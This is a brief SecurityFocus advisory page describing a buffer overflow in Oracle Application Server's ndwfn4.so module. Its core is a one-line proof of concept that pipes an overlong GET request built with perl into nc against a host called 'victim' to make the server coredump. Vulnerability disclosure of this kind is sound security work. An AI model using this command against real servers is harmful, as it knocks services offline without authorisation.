Oracle Application Server ndwfn4.so buffer overflow

Assuming the OAS prefix is /jsp/ and the vulnerable host is 'victim', the following command issued by the attacker will cause the iWS to coredump:

perl -e 'print "GET /jsp/","A"x2050," HTTP/1.0\n\n"' | nc victim 80


 

Privacy Statement
Copyright 2010, SecurityFocus